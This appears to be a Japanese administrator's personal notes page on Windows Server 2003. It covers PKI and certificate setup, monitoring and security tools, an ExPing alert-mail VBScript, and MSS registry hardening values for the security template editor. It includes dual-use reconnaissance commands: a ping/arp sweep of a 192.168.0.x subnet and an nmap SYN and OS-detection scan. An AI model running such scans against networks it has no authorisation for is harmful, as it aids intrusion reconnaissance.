How to enable LDAP over SSL with a third-party certification authority
Windows Server 2003 PKI 運用ガイド
[IIS]SSL を使用するように Certificate Server を設定する方法
Windows Server 2003、Windows XP、および Windows 2000 に必要な信頼されたルート証明書
Windows Server 2003 または Windows 2000 Server 証明機関により発行される証明書の有効期限を変更する方法
Windows 2000 および Windows Server 2003 証明書サービス Web 登録の構成とトラブルシューティング
IIS 6.0 における認証
証明書
個人情報保護法時代のIISセキュリティ対策(前編)
http://www.atmarkit.co.jp/fwin2k/operation/iisssl01/iisssl01_01.html
●PKIの基礎を理解しよう!PKI基礎講座(1)
http://www.atmarkit.co.jp/fnetwork/rensai/pki01/pki01.html
徹底比較 SSLサーバ証明書の「値段」と「品質」
http://nmag.jp/contents/servercertificate/index.html
IIS を後からセットアップして、Web登録ページを利用する場合は
certutil -vroot
ドメインで管理している場合で、内部に証明機関をインストールして
リバースプロクシとして利用する場合はSPN に URL を登録する必要がある。
http://www.microsoft.com/japan/technet/windowsserver/2003/technologies/security/webenroll.mspx
Web 登録ページを使わない場合は証明機関の拡張機能で、CRL 配布ポイントと機関情報アクセス(AIA)
の URL を オンラインになっているサーバで公開するように URL を書き換えて、IIS でアクセスできるように
するだけ。CA の書き換えは必要。
※IIS から証明書の要求をする場合は最大120分待つ必要がある。
また、コンピュータアカウントの証明ストアの信頼するルート証明に証明書をインポートしておく。
Windows Vista、Windows XP、Windows Server 2003、および Windows Server 2008 で認証サーバーを使用する場合に PEAPv0 を構成して、"man-in-the-middle" 攻撃およびパスワード ベースの攻撃に対する潜在的なリスクを低減する方法
http://support.microsoft.com/kb/941123
ネットワーク アクセス保護(NAP)が証明書でない、そして、準拠 Windows Server 2003 ベースのエンタープライズ CA が代替不正のサブジェクト名を持つ証明書を発行します
http://support.microsoft.com/kb/943089
個人証明の更新後、証明書が必要なサイトへアクセスした時に同じ物が2つ出てくる場合は、期限切れの方を削除しましょう。
IE の インターネットオプションからコンテンツタブを開いて、証明書ボタンをクリック。
個人タブから該当する証明書を削除。
この手順で削除しても、2つ出てくる場合は
プログラムの実行で「certmgr.msc」と入力
証明書 - 現在のユーザー
- 個人
証明書
ここに過去の証明書が残っているので選択して右クリックから削除
この証明書は有効期限が長いですので、忘れた頃に切れてしまうんですよね。
期限切れには注意しましょう。
ANAのシステム障害、原因は「認証機能の有効期限切れ」
http://www.itmedia.co.jp/news/articles/0809/18/news089.html
インターネット インフォメーション サービス 7. 0 で証明書の要求を完了すると、エラー メッセージ:「この証明書ファイルに関連付けられている証明書の要求が見つかりません」
http://support.microsoft.com/kb/931204
エンタープライズPKI導入のススメ ―― [1]独学! 10分でわかるPKI
http://www.computerworld.jp/topics/mws/166149.html
エンタープライズPKI導入のススメ ―― [2]自力で構築するPKI
http://www.computerworld.jp/topics/mws/166589.html
SHA256、SHA384、SHA512を選択すると Windows 2003 や XP で不具合が出るようでパッチが出ています。
http://support.microsoft.com/kb/968730/
APIPAを無効(または有効)にする
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Services\Tcpip\Parameters
値の名前 : IPAutoconfigurationEnabled
データ型 : DWORD
値 : 無効:0、有効:1
レジストリの書き替え内容
デフォルトではこの「IPAutoconfigurationEnabled」という値は存在しないので、新規に作成する必要がある。
http://www.atmarkit.co.jp/fpc/pctips/019disableapipa2k/disableapipa2k.html
複数の更新プログラムを 1 回の再起動のみでインストールする方法
ここを参考に。
複数の Windows Update または修正プログラムを同時にインストールし、再起動を 1 回で済ませる方法
Windowsコマンド集
マウス ソフトウェア
IntelliPoint 5.2 マウス ソフトウェア (Windows XP および Windows 2000 対応)
NetEnum
LAN内のIPアドレス一覧作成、各種ネットワークコマンド実行
MAC アドレスと IPアドレスの緋も付けは、ping と arp コマンドを交互に利用する事で確認できます。
コマンドラインから
for /l %i in (0,1,255) do ping -w 1 -n 1 192.168.0.%i && arp -a 192.168.0.%i >> arp.log
など
使用中のIPアドレスを調査する
右クリックでハッシュ値を調べるツール
Download HashTab v1.9
ヘッダ情報の確認に
MiArt HTTP Info Tool
TCP/UDPのポート確認に
TCPView
このサイトは便利なツールがそろっています。
パケットキャプチャ
Download version 1.5.2 (freeware) これは優れもの。
EPDエポックパケットディレクター
Fiddler HTTP プロトコル解析支援ツール@IEアドオン
先人に聞こう!オススメのネット運用管理ツール
稼働中のコンピュータの監視に
ExPing
複数のアドレスに対してPING出来るソフト
#エラーを感知したときに外部プログラムを走らせる事が可能です。。
メール送信サンプル ファイルは alertmail.vbs とする。
'***********************************************************
'* Ping に応答しなかった場合メールを送信
'*
'* 利用アプリケーション
'* ExPing http://www.woodybells.com/
'* BASP21 http://www.hi-ho.ne.jp/babaq/basp21.html
'*
'* Exping 環境設定
'* 外部プログラムを起動
'* プログラム: alertmail.vbs
'* オプション: %d %n %e
'*
'* メールの本文は、
'* Ping の応答がありません。
'* 2005/02/22 12:00:00
'* 61.194.16.124
'* http://www.netdive.jp
'* このようになります。
'* ※ 対象 に
'* 61.194.16.124 http://www.netdive.jp
'* と記述した場合
'***********************************************************
Option Explicit
Dim Args
Dim BASP
Dim i
Dim Error
Dim mailBody
'***********************************************************
'* 初期設定
'***********************************************************
Const MailServer = "mail.netdive.jp" 'メールサーバ
Const mailTo = "Webmaster@netdive.jp" '送信元アドレス
Const mailSubject = "*** Alert from Exping ***" 'タイトル
Const mailFile = "\ExPing.log" '添付ファイル
Const mailFrom = "info@netdive.jp" '送信先アドレス
'***********************************************************
'* ExPingからパラメータを受け取り本文生成
'***********************************************************
mailBody = "Ping の応答がありません。"
Set Args = WScript.Arguments
If Args.Count <> 0 Then
For i=0 To Args.Count -1
If i=0 Then
mailBody = mailBody & vbCrLf & _
Args(i) & " " & Args(i+1)
i= i+ 1
ElseIf i>3 Then
mailBody = mailBody & Args(i)
Else
mailBody = mailBody & vbCrLf & Args(i)
End If
Next
End If
'***********************************************************
'* メールを送信
'***********************************************************
Set BASP = CreateObject("basp21")
Error = BASP.SendMail(Mailserver, mailFrom, mailTo, mailSubject, mailBody, "")
'Error = BASP.SendMail(Mailserver, mailFrom, mailTo, mailSubject, mailBody, mailFile) 'ログを添付する場合
'Wscript.Echo Error '送信出来ない場合のエラー確認
'***********************************************************
'* 終了
'***********************************************************
Set BASP = Nothing
Set Args = Nothing
Wscript.Quit
BASP を使わないメールの送信の仕方はこっちを参考に。
WindowsでSnortを動かしてみる(Snort+IDScenter)
http://www.snort.gr.jp/docs/idscenter/menu.html
Snort IDScenter 1.1 日本語マニュアル
http://www.snort.gr.jp/transdoc/IDScenter_J/IDScenter_1_1_manual_jp.htm
ドキュメント
http://www.snort.gr.jp/docs/index.html
翻訳ドキュメント
http://www.snort.gr.jp/transdoc/
Microsoft Internet Security and Acceleration (ISA) Server 2004
※Windows Server 2003 で ISA Server を実行する
※[HOWTO] Windows Server 2003 上の ISA Server を使用して Web サービスを公開する方法
市販品では、RealSecure BlackICE Server Protection があります。
オフィシャルサイト http://www.blackice.jp/
ウイスルチェックソフト
シマンテック
マカフィー
トレンドマイクロ
Sophos
F-Secure
KASPERSKY
CANON SYSTEM SOLUTIONS
ALWIL Software (avast! 4)
BitDefender Free Edition 7.2 日本語化
# Windows 2000 または Windows Server 2003 のドメイン コントローラでウイルス スキャンを行う場合の推奨事項
# [INF] SQL Server を実行しているコンピュータで使用するウイルス対策ツール
ポートスキャナツール
NetEnum
SuperScan
NmapWin
nmapNT
WinPcap(セットで入れておくと良い)
コマンドラインから
nmapnt -v -sS -O 192.168.0.1 > scanlist.txt
で、結果をファイルに格納できる。
アプリケーション脆弱性スキャナ
ScanDo
WebProbe
AppScan
WebInspect
PrisonMEMO Pro これ買ってみましたが、まだ触ってません…
ルートキット検出ソフト
RootkitRevealer
コマンドラインから
rootkitrevealer.exe -a -c c:\rootkit.log
で、「rootkit.log」というファイルが作成される。
ログ解析
ログアナキング
日本 Analog ユーザ会
Log Parser 2.2
Managed Syslog Server Windows 用のフル機能な syslog サーバ (フリー)説明ページ
デバッグツール
Debugging Tools for Windows
ネットワーク スニッファ検出ツール
promqry 1.0 / PromqryUI 1.0
マイクロソフトの Securing Windows 2000 Server ソリューション 第 9 章 ‐ 監査と侵入検出 にも、ツールが載っています。
コンピュータ系blog: セキュリティ アーカイブ
http://kinshachi.ddo.jp/kurage/html/MT/comp/archives/cat_e.html
IISツール
Internet Information Services (IIS) 6.0 Resource Kit Tools
#ツールも収録されている Microsoft Windows Server 2003リソースキット機能編IIS6.0 が役に立ちます。
840671 - IIS 6.0 Resource Kit Tools について
パフォーマンスのチェックとか
IIS サーバーのパフォーマンスの分析ツール
複数異種のデータベースを同時に管理
DBArtisan
# Oracle、Sybase、Microsoft SQL Server、IBM DB2 UDBに対応しています。
その他の管理ツール
Microsoft SQL Web Data Administrator
MSDE 2000 Partners
SQL Server の Guest アカウントと脆弱な sa パスワードチェック
SQL Server Audit Utility
Official release of SQL Power Injector v1.0
Microsoft Operation Manager
Windows Server 2003 SP1 を実行しているコンピュータに MOM 2005 をインストールすると発生する可能性がある問題について
ネットワークの監視(MRTG)
MRTG: The Multi Router Traffic Grapher
MRTG 公式日本語サイト e2j@mrtg.jpさんによる日本語の翻訳。
MRTG for Intrusion Detection with IIS 6 (SecurityFocus)
「SNMP」「WMI/VBScript」「LogParser/Batch File」を使って IIS サーバの侵入検知をしましょうという話。
Desktop On-Call 携帯でデスクトップ監視が出来るっぽい(VNC みたいな感じ)30日の体験版有り。
サーバ管理者のためのイベントログ運用の基本 てな本を手に入れた。(まだ読んでないけど・・・)
Windows Server 2003 で Vrfydsk.exe ツールを使用して、ボリュームをオフライン状態にせずにボリュームのエラーをチェックする方法
http://support.microsoft.com/default.aspx?scid=kb;ja;837326
SSH
freeSSHd (Windows上で動作する SSH サーバ)
Windows用定番SSHクライアント「Tera Term」の使い方
http://sourceforge.jp/magazine/09/02/02/0412259
Windows Script Decoder
http://fw.moongift.jp/intro/i-1539.html
Windows Script Encoder でエンコードされたスプリクトをデコードするソフト。
一通りセット
SPACE TAG
http://www.spacetag.jp/modules/download/
Apach、MySQL、PostgreSQL、BIND、XMAIL、PHP、Perl など一括インストール可能なパッケージが用意されています。
64bitアプリ関連
マイクロソフト、「Windows Media Encoder 9」の64bit版を公開
「Daemon Tools」v4の64ビットWindows対応版が公開
IntelliType Pro 5.5 キーボード ソフトウェア (Windows)
IntelliPoint 5.5 マウス ソフトウェア Windows
EmEditor Professional v5
x64ネイティブ、NAC Version2に対応した「ウイルスバスター コーポレートエディション 7.3」を発表
キヤノンシステムソリューションズ、 Windows x64 Editionにネイティブ対応した『NOD32アンチウイルス64ビット版』 を6月に発売――先行モニター受け付けを開始
32ビット・アプリケーションでも利点がある
http://itpro.nikkeibp.co.jp/article/COLUMN/20051118/224849
32ビットの実行性能がよい秘密
http://itpro.nikkeibp.co.jp/article/COLUMN/20051118/224885
マシン語の一部が32ビットと異なる
http://itpro.nikkeibp.co.jp/article/COLUMN/20051121/224935
安心してx64に移行するためのポイント
http://itpro.nikkeibp.co.jp/article/COLUMN/20051124/225118
既存のソースを64ビットに移植する
http://itpro.nikkeibp.co.jp/article/COLUMN/20051124/225141
不要なレジストリキーを削除するツール
NTREGOPT
http://www.larshederer.homepage.t-online.de/erunt/index.htm
その他
開発用通信プロトコルコンポーネント「IP*Works!」
http://cgi.itmedia.co.jp/tt/3495/20060411/tt/news/0604/10/news03.html
HTTP,FTP,POP,IMAP,WebDAV,XMLなどの主要プロトコルコンポーネント。 ASP から利用できるみたい。
米Microsoft、Webコンテンツセキュリティ技術「Web Sandbox」をオープンソースに
http://sourceforge.jp/magazine/09/01/29/0437200
Internet Explorer のアドオンを無効化(XP SP2)
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions
値の名前 : NoExtensionManagement
データ型 : DWORD
値 : 無効:0、有効:1
グループポリシーからも設定出来ます。
ファイル名を指定して実行で、gpedit.msc と入力。
[コンピュータの構成]、または [ユーザーの構成] から
[管理用テンプレート]>[Windows コンポーネント]>[Internet Explorer]
「ユーザーによるアドオンの有効化および無効化を許可しない」で設定可能。
Windows XP Service Pack 2 で Internet Explorer のアドオンを管理する方法
Windows XP Service Pack 2 の新機能アドオンの管理について
レジストリの追加設定(Windows Server 2003、Windows XP )
%systemroot%\inf\sceregvl.inf に下記データを追加し「regsvr32 scecli.dll」と入力して SCE DLL を再登録する。
セキュリティ構成エディタを起動すると MSS( Microsoft Solutions for Security の意味で、このガイドを作成したグループの名前です)
というこれらのカスタム レジストリ値が表示されます。多少日本語表示に書き直しています。
キーの説明
RegPath: Includes the registry keypath and value
RegType: 1 - REG_SZ, 2 - REG_EXPAND_SZ, 3 - REG_BINARY, 4 - REG_DWORD, 7 - REG_MULTI_SZ
Display Name: Is a localizable string defined in the [strings] section
Display type: 0 - boolean, 1 - Number, 2 - String, 3 - Choices, 4 - Multivalued, 5 - Bitmask
Options: If Displaytype is 3 (Choices) or 5 (Bitmask), then specify the range of values and corresponding display strings
in value|displaystring format separated by a comma.
[Register Registry Values] に追加
;========================= MSS Values ==========================
MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\EnableICMPRedirect,4,%EnableICMPRedirect%,0
MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\SynAttackProtect,4,%SynAttackProtect%,3,0|%SynAttackProtect0%,1|%SynAttackProtect1%,2|%SynAttackProtect2%
MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\EnableDeadGWDetect,4,%EnableDeadGWDetect%,0
MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\EnablePMTUDiscovery,4,%EnablePMTUDiscovery%,0
MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\KeepAliveTime,4,%KeepAliveTime%,3,150000|%KeepAliveTime0%,300000|%KeepAliveTime1%,600000|%KeepAliveTime2%,1200000|%KeepAliveTime3%,2400000|%KeepAliveTime4%,3600000|%KeepAliveTime5%,7200000|%KeepAliveTime6%
MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\DisableIPSourceRouting,4,%DisableIPSourceRouting%,3,0|%DisableIPSourceRouting0%,1|%DisableIPSourceRouting1%,2|%DisableIPSourceRouting2%
MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\TcpMaxConnectResponseRetransmissions,4,%TcpMaxConnectResponseRetransmissions%,3,0|%TcpMaxConnectResponseRetransmissions0%,1|%TcpMaxConnectResponseRetransmissions1%,2|%TcpMaxConnectResponseRetransmissions2%,3|%TcpMaxConnectResponseRetransmissions3%
MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\TcpMaxDataRetransmissions,4,%TcpMaxDataRetransmissions%,1
MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\PerformRouterDiscovery,4,%PerformRouterDiscovery%,0
MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\TCPMaxPortsExhausted,4,%TCPMaxPortsExhausted%,1
MACHINE\System\CurrentControlSet\Services\Netbt\Parameters\NoNameReleaseOnDemand,4,%NoNameReleaseOnDemand%,0
MACHINE\System\CurrentControlSet\Services\Eventlog\Security\WarningLevel,4,%WarningLevel%,3,50|%WarningLevel0%,60|%WarningLevel1%,70|%WarningLevel2%,80|%WarningLevel3%,90|%WarningLevel4%
MACHINE\System\CurrentControlSet\Services\AFD\Parameters\DynamicBacklogGrowthDelta,4,%DynamicBacklogGrowthDelta%,1
MACHINE\System\CurrentControlSet\Services\AFD\Parameters\EnableDynamicBacklog,4,%EnableDynamicBacklog%,0
MACHINE\System\CurrentControlSet\Services\AFD\Parameters\MinimumDynamicBacklog,4,%MinimumDynamicBacklog%,1
MACHINE\System\CurrentControlSet\Services\AFD\Parameters\MaximumDynamicBacklog,4,%MaximumDynamicBacklog%,3,10000|%MaximumDynamicBacklog0%,15000|%MaximumDynamicBacklog1%,20000|%MaximumDynamicBacklog2%,40000|%MaximumDynamicBacklog3%,80000|%MaximumDynamicBacklog4%,160000|%MaximumDynamicBacklog5%
MACHINE\System\CurrentControlSet\Control\FileSystem\NtfsDisable8dot3NameCreation,4,%NtfsDisable8dot3NameCreation%,0
MACHINE\System\CurrentControlSet\Control\SessionManager\SafeDllSearchMode,4,%SafeDllSearchMode%,0
MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun,4,%NoDriveTypeAutoRun%,3,0|%NoDriveTypeAutoRun0%,255|%NoDriveTypeAutoRun1%
MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ScreenSaverGracePeriod,4,%ScreenSaverGracePeriod%,1
Microsoft Windows Server 2003 TCP/IP 実装詳細
http://www.microsoft.com/japan/technet/prodtechnol/windowsserver2003/technologies/networking/tcpip03.mspx
ここを参考にすれば下記メッセージを日本語化できるかな。
[Strings] に追加
;================================ MSS Settings ===========================
EnableICMPRedirect = "MSS: ICMP着信転送メッセージに応答してルートテーブルの変更を制限する"
SynAttackProtect = "MSS: SYN攻撃に対する保護を有効にする"
SynAttackProtect0 = "SYN攻撃に対して典型的なプロテクトを行う(デフォルト)"
SynAttackProtect1 = "SYN攻撃に対して TcpMaxHalfOpen および TcpMaxHalfOpenRetried の設定値を超えた場合保護する"
SynAttackProtect2 = "SYN攻撃に対して最も効率良いプロテクトを行う"
EnableDeadGWDetect = "MSS: 停止しているゲートウェイの検出を制限する"
EnablePMTUDiscovery = "MSS: 非常に小さな値に断片化されたMTUからの保護"
KeepAliveTime = "MSS: TCPがKeep Aliveパケットを送信してアイドル状態の接続がそのままであることを確認する頻度"
KeepAliveTime0 ="150000 or 2.5 minutes"
KeepAliveTime1 ="300000 or 5 minutes (recommended)"
KeepAliveTime2 ="600000 or 10 minutes"
KeepAliveTime3 ="1200000 or 20 minutes"
KeepAliveTime4 ="2400000 or 40 minutes"
KeepAliveTime5 ="3600000 or 1 hour"
KeepAliveTime6 ="7200000 or 2 hours (default value)"
DisableIPSourceRouting = "MSS: ソース ルーティングの経路を確認する"
DisableIPSourceRouting0 = "No additional protection, source routed packets are allowed"
DisableIPSourceRouting1 = "Medium, source routed packets ignored when IP forwarding is enabled"
DisableIPSourceRouting2 = "Highest protection, source routing is completely disabled"
TcpMaxConnectResponseRetransmissions = "MSS:SYN-ACKを転送するときに応答があるまで再送信を試行する回数"
TcpMaxConnectResponseRetransmissions0 = "No retransmission, half-open connections dropped after 3 seconds"
TcpMaxConnectResponseRetransmissions1 = "3 seconds, half-open connections dropped after 9 seconds"
TcpMaxConnectResponseRetransmissions2 = "3 & 6 seconds, half-open connections dropped after 21 seconds"
TcpMaxConnectResponseRetransmissions3 = "3, 6, & 9 seconds, half-open connections dropped after 45 seconds"
TcpMaxDataRetransmissions = "MSS:接続を切断するまでにTCPが個々のデータ セグメントを再送信する回数"
PerformRouterDiscovery = "MSS: RFC1256に基づくルーター検出の実行"
TCPMaxPortsExhausted = "MSS: SYN-ATTACK保護の適用を開始するタイミング"
NoNameReleaseOnDemand = "MSS: NetBIOS 名を解放しないよう保護する"
NtfsDisable8dot3NameCreation = "MSS: 8.3 形式のファイル名を自動生成する"
NoDriveTypeAutoRun = "MSS: 全てのドライブの自動起動を無効化する"
NoDriveTypeAutoRun0 = "Null, allow Autorun"
NoDriveTypeAutoRun1 = "255, disable Autorun for all drives"
WarningLevel = "MSS: セキュリティ ログがいっぱいになった場合にイベント エントリに記録するタイミング"
WarningLevel0 = "50%"
WarningLevel1 = "60%"
WarningLevel2 = "70%"
WarningLevel3 = "80%"
WarningLevel4 = "90%"
ScreenSaverGracePeriod = "MSS:スクリーンセーバーのパスワード保護をすぐに有効にする"
DynamicBacklogGrowthDelta = "MSS:(AFD DynamicBacklog GrowthDelta) Number of connections to create when additional connections are necessary for Winsock applications (10 recommended)"
EnableDynamicBacklog = "MSS:動的バックログ機能の利用"
MinimumDynamicBacklog = "MSS:リスニングのエンドポイントで許可される最小フリー接続数"
MaximumDynamicBacklog = "MSS:リスニングのエンドポイントで許可される最大(準フリー)接続数"
MaximumDynamicBacklog0 = "10000"
MaximumDynamicBacklog1 = "15000"
MaximumDynamicBacklog2 = "20000 (recommended)"
MaximumDynamicBacklog3 = "40000"
MaximumDynamicBacklog4 = "80000"
MaximumDynamicBacklog5 = "160000"
SafeDllSearchMode = "MSS:セーフ DLL 検索モードの有効化"
ベースライン セキュリティ テンプレートに追加さる項目(値は推奨値)
■EnableICMPRedirect
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters
値の名前 : EnableICMPRedirect
データ型 : REG_DWORD
値 : 0
[1]: [有効]
0 : [無効]
■SynAttackProtect
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters
値の名前 : SynAttackProtect
データ型 : REG_DWORD
値 : 1
1 : 有効 [Connections time-out more quickly if a SYN - ATTACK is detected]
[0]: 無効 [No additional protection, use default settings]
■EnableDeadGWDetect
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters
値の名前 : EnableDeadGWDetect
データ型 : REG_DWORD
値 : 0
[0]: [無効]
1 : [有効]
■EnablePMTUDiscovery
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters
値の名前 : EnablePMTUDiscovery
データ型 : REG_DWORD
値 : 0
0 : [無効]
[1]: [有効]
■KeepAliveTime
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters
値の名前 : KeepAliveTime
データ型 : REG_DWORD
値 : 300000
150000 : [150000 or 2.5 minutes]
300000 : [300000 or 5 minutes (recommended)]
600000 : [600000 or 10 minutes]
1200000 : [1200000 or 20 minutes]
2400000 : [2400000 or 40 minutes]
3600000 : [3600000 or 1 hour]
[7200000]: [7200000 or 2 hours (default value)]
設定可能な値は 1 から 0xFFFFFFFF
■DisableIPSourceRouting
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters
値の名前 : DisableIPSourceRouting
データ型 : REG_DWORD
値 : 2
1 : [No additional protection, source routed packets are allowed]
[0]: [Medium, source routed packets ignored when IP forwarding is enabled]
2 : [Highest protection, source routing is completely disabled]
■TcpMaxConnectResponseRetransmissions
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters
値の名前 : TcpMaxConnectResponseRetransmissions
データ型 : REG_DWORD
値 : 2
0 : [No retransmission, half-open connections dropped after 3 seconds]
1 : [3 seconds, half-open connections dropped after 9 seconds]
[2]: [3 & 6 seconds, half-open connections dropped after 21 seconds]
3 : [3, 6, & 9 seconds, half-open connections dropped after 45 seconds]
設定可能な値は 0 から 0xFFFFFFFF
■TcpMaxDataRetransmissions
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters
値の名前 : TcpMaxDataRetransmissions
データ型 : REG_DWORD
値 : 3
[5] : ユーザー定義の値
設定可能な値は 0 から 0xFFFFFFFF
■PerformRouterDiscovery
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters
値の名前 : PerformRouterDiscovery
データ型 : REG_DWORD
値 : 0
[0]: [無効]
1 : [有効]
■TCPMaxPortsExhausted
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters
値の名前 : TCPMaxPortsExhausted
データ型 : REG_DWORD
値 : 5
[5] : ユーザー定義の値
設定可能な値は 0 から 0xFFFF
AFD.SYS の設定
■DynamicBacklogGrowthDelta
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AFD\Parameters
値の名前 : DynamicBacklogGrowthDelta
データ型 : REG_DWORD
値 : 10
[0] : ユーザー定義の値
設定可能な値は 0 から 0xFFFFFFFF
■EnableDynamicBacklog
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AFD\Parameters
値の名前 : EnableDynamicBacklog
データ型 : REG_DWORD
値 : 1
1 : [有効]
[0]: [無効]
■MinimumDynamicBacklog
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AFD\Parameters
値の名前 : MinimumDynamicBacklog
データ型 : REG_DWORD
値 : 20
[0] : ユーザー定義の値
設定可能な値は 0 から 0xFFFFFFFF
■MaximumDynamicBacklog
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AFD\Parameters
値の名前 : MaximumDynamicBacklog
データ型 : REG_DWORD
値 : 20000
10000: [10000]
15000: [15000]
20000: [20000 (recommended)]
40000: [40000]
80000: [80000]
160000: [160000]
設定可能な値は 1 から 0xFFFFFFFF 既定値は 0
■Configure NetBIOS Name Release Security
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Netbt\Parameters
値の名前 : NoNameReleaseOnDemand
データ型 : REG_DWORD
値 : 1
[1]: [有効]
0 : [無効]
■Disable Auto Generation of 8.3 File Names
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\FileSystem
値の名前 : NtfsDisable8dot3NameCreation
データ型 : REG_DWORD
値 : 1
1 : [有効]
[0]: [無効]
■Disable Autorun
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer
値の名前 : NoDriveTypeAutoRun
データ型 : REG_DWORD
値 : 0xFF
[0]: [無効] [Null, allow Autorun]
255: [有効] [255, disable Autorun for all drives]
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\
値の名前 : AutoRun
データ型 : REG_DWORD
値 : 0
1 : [有効]
[0]: [無効]
■Make Screensaver Password Protection Immediate
HKEY_LOCAL_MACHINE\SYSTEM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
値の名前 : ScreenSaverGracePeriod
データ型 : REG_String
値 : 0
[5] : ユーザー定義の値
設定可能な値は 0 から 255(秒)
■Security Log Near Capacity Warning
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\Security
値の名前 : WarningLevel
データ型 : REG_DWORD
値 : 0
設定可能な値は 0 から 100 既定値は 0 (警告イベントが生成されない)
■Enable Safe DLL Search Order
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager
値の名前 : SafeDllSearchMode
データ型 : REG_DWORD
値 : 0
1 : [有効]
[0]: [無効]
参考
脅威とその対策 - Windows Server 2003 と Windows XP のセキュリティ設定
追加のレジストリ設定 に書かれている定義をそのまま貼り付けるとハマるので注意。
※レジストリに上記キーを追加すれば個別で機能します。
第 5 章 - セキュリティの構成
Windows Server 2003 をセキュリティ保護する
上記対策を施してあれば Windows XP SP2とServer 2003,“古典的な攻撃”の影響を受けることが明らかに は防げるようです。
[HOWTO] Windows Server 2003 で DoS 攻撃に対して TCP/IP スタックを強化する方法
ドメインコントローラに登録すれば、ポリシーの設定で一括反映されます。
アレンジすれば、好きな設定を追加出来そうですね。
試しに追加
[Register Registry Values] に追加
;========================= カスタムセキュリティ Values ==========================
MACHINE\Software\Microsoft\Windows\CurrentVersion\policies\Network\DisablePwdCaching,4,%DisablePwdCaching%,0
MACHINE\System\CurrentControlSet\Control\FileSystem\NtfsDisableLastAccessUpdate,4,%NtfsDisableLastAccessUpdate%,0
MACHINE\System\CurrentControlSet\Control\Lsa\NoLMHash,4,%NoLMHash%,0
MACHINE\System\CurrentControlSet\Control\Lsa\DisableDomainCreds,4,%DisableDomainCreds%,0
MACHINE\System\CurrentControlSet\Control\WaitToKillServiceTimeout,1,%WaitToKillServiceTimeout%,3,5000|%WaitToKillServiceTimeout1%,20000|%WaitToKillServiceTimeout2%,120000|%WaitToKillServiceTimeout3%
MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters\Hidden,4,%ServerHidden%,0
MACHINE\System\CurrentControlSet\Services\lanmanserver\parameters\Size,4,%MemorySize%,3,1|%MemorySize0%,2|%MemorySize1%,3|%MemorySize2%
MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\MaxUserPorts,4,%MaxUserPorts%,3,5000|%MaxUserPorts0%,10000|%MaxUserPorts1%,20000|%MaxUserPorts2%,50000|%MaxUserPorts3%
MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\TcpTimedWaitDelay,4,%TcpTimedWaitDelay%,3,240|%TcpTimedWaitDelay0%,10|%TcpTimedWaitDelay1%,30|%TcpTimedWaitDelay2%,60|%TcpTimedWaitDelay3%
MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\IPAutoconfigurationEnabled,4,%IPAutoconfigurationEnabled%,0
MACHINE\System\CurrentControlSet\Control\Lsa\Kerberos\Parameters\LogLevel,4,%KerberosLog%,0
MACHINE\System\CurrentControlSet\Control\StorageDevicePolicies\WriteProtect,4,%WriteProtect%,0
[Strings] に追加
;================================ カスタムセキュリティ Settings ===========================
ServerHidden = "カスタム セキュリティ: ネットワークコンピュータからコンピュータを隠す"
NtfsDisableLastAccessUpdate = "カスタム セキュリティ: ファイルやフォルダの最終アクセス時刻の記録をしない"
NoLMHash = "カスタム セキュリティ: LM ハッシュの作成を無効化する"
DisablePwdCaching = "カスタム セキュリティ: パスワード保存機能を無効にする"
DisableDomainCreds = "カスタム セキュリティ: ドメイン(.NET)パスワード保存機能を無効にする"
MemorySize = "カスタム セキュリティ: Server サービスが利用するメモリー量やネットワーク速度の調整"
MemorySize0 = "メモリーの使用を最小化"
MemorySize1 = "バランスを取る"
MemorySize2 = "ネットワーク帯域の使用を最大化する"
WaitToKillServiceTimeout = "カスタム セキュリティ: シャットダウンの待ち時間(単位はミリ秒)"
WaitToKillServiceTimeout1 = "5000ミリ秒"
WaitToKillServiceTimeout2 = "20000ミリ秒(デフォルト)"
WaitToKillServiceTimeout3 = "120000ミリ秒"
MaxUserPorts = "カスタム セキュリティ: ユーザーアクセス可能な一時ポートの数を調整"
MaxUserPorts0 = "5000(デフォルト)"
MaxUserPorts1 = "10000"
MaxUserPorts2 = "20000"
MaxUserPorts3 = "50000"
